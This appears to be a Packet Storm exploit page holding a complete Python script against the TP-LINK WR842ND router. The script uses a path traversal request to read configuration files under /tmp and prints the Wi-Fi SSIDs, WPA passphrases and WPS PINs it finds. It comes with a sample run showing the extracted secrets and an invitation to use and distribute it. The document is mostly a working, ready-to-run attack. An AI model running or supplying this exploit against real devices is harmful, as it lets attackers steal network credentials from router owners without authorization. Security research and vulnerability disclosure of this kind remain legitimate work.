TP-LINK WR842ND suffers from a remote directory traversal vulnerability.
ac4197fdb577b1dab807bec29d445b9cd6d5ff28f301aaac5ea7915033dfc735#!/usr/bin/python
'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.
Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n
Feel free to use, modify and distribute.
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
:: Crafting and sending evil request..
-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"
:: Search for another networks? (y/n)
> y
:: Searching..
:: Jumping for SSID 1..
-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"
:: Jumping for SSID 2..
:: Jumping for SSID 3..
:: Jumping for SSID 4..
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->
'''
import requests,sys,socket
from time import sleep
data=''
data2=''
url=''
W = '\033[0m'
R = '\033[31m'
B = '\033[34m'
#KISS
def parse_data(text):
words = text.split()
for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W
def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk
if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()
url = make_url(sys.argv[1],0)
if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]
headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}
print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"
try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content
except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()
if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W
print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")
if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W
for i in range(1,5) :
print W+":: Jumping for SSID %s..\n" %(i)
sleep(3)
url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content
if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"
else :
print W+"\n:: Bye!"
print
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed